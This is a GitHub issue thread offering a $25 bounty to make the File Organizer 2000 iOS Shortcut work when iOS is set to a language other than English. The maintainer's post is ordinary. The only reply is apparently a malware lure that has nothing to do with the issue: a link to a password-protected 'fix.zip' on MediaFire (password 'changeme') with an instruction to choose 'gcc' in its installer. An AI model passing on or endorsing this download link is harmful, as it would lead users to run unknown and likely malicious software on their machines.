### ISSUE TITLE
 💰 $25 USD Bounty: Build the iOS shortcut to make it compatible in any language

### ISSUE THREAD

**Issue by aexshafii** [different-ai/file-organizer-2000#210]
Ben built an iOS shortcut that allows users to send their audios, photos, and notes from iOS to Obsidian. It works great. But there is a problem: it only works if your iOS is in English. 

We have managed to make it work for a user that has his iOS in German, but we had to change the setup slightly (directly on his phone). Now we want to build an iOS shortcut that works in all languages. It shouldn't be too hard, and can be a fun task with a $25 USD reward to thank you for building it, for whoever achieves it. And requires no coding skills. 

The reason why we are doing this is because I  have now been working on File Organizer 2000 mostly by myself, with Ben only participating in meetings about the direction of the product, as well as laying the foundations for major features (e.g. the new ai chat). And we had this idea to start a bounty system to make faster progress, as well as encouraging others to build with us. 

You can see the images below, with the differences between the English and German versions, to give you an idea of what needs to be changed. The issue is that it is currently relying on some 'strings', which vary according to the language of iOS. 

------ 

**iOS shortcut to send Apple Notes and Audios to Obsidian**

The iOS shortcut below makes it easy for you to easily work from your phone with this plugin.

https://www.icloud.com/shortcuts/06915768862848fb9711f2f19b6405e2

how to set it up: https://youtu.be/zWJgIRlDWkk?si=HSeOUKaMfJvaLtKI

**Notes:**

- It works when your vault is on a cloud drive. I use it with iCloud and works great. Doesn't work with OneDrive last time I tested.
- Currently only works if your iOS is in English. But if you reach out on discord I can help you set it up in your language.

![IMG_0138](https://github.com/user-attachments/assets/dc295f03-03c5-465a-a416-5e6ad3572abe)
![IMG_0140](https://github.com/user-attachments/assets/16f44650-bed3-4ab9-b626-c5be7b56822c)
![IMG_0141](https://github.com/user-attachments/assets/bb34ebec-b9fe-4865-9949-93c98d8404aa)

![IMG_0135](https://github.com/user-attachments/assets/5ad1ebe0-346b-481b-86a3-dd955cf0e86d)

![IMG_0133](https://github.com/user-attachments/assets/6f8815b9-1061-413b-ab02-721f83c391c9)

![IMG_0134](https://github.com/user-attachments/assets/16243d76-4eb1-465b-872c-ffe322e7139a)

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
